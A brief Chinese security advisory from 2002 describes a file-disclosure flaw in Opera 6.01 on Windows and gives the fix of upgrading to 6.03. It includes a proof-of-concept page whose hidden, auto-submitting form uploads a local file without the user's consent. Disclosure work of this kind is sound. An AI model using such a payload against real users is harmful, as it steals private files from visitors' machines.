Opera存在任意本地文件可读取漏洞发布时间:2002-05-29 更新时间:2002-05-29 严重程度:高 威胁程度:远程非授权文件存取 错误类型:设计错误 利用方式:服务器模式 受影响系统 Opera 6.01 on Windows platforms.详细描述 Opera是小型快速安全的WEB浏览器。 Opera类似所有浏览器,支持<input type="file">元素,这是标准的用户上载文件到HTTP服务器方式,由于文件元素是安全敏感型元素,所以多数WEB浏览器不允许它的"value"属性被设置,如果可以设置的话,就可以导致远程攻击者获得本地任意文件。Opera处理文件元素的方式不同,其"value"值可以设置,但在发送之前会有对话框警告。 其中存在漏洞可导致绕过文件元素确认对话框,意味着攻击者可以任意下载被本地文件。通过简单的在文件元素"value"属性之后追加" "(HTML代码代表ASCII码中的新行),可绕过opera安全机制而发送表单中的文件。 测试代码 <body onload="document.secForm.submit()"> <form method="post" enctype="multipart/form-data" action="recFile.php" name="secForm"> <input type="file" name="expFile" value="c:\test.txt " style="visibility:hidden"> </form> </body> 解决方案 下载opera 6.03版本。 相关信息 GreyMagic Software (security@greymagic.com) 参考:http://security.greymagic.com/adv/gm001-op/ |
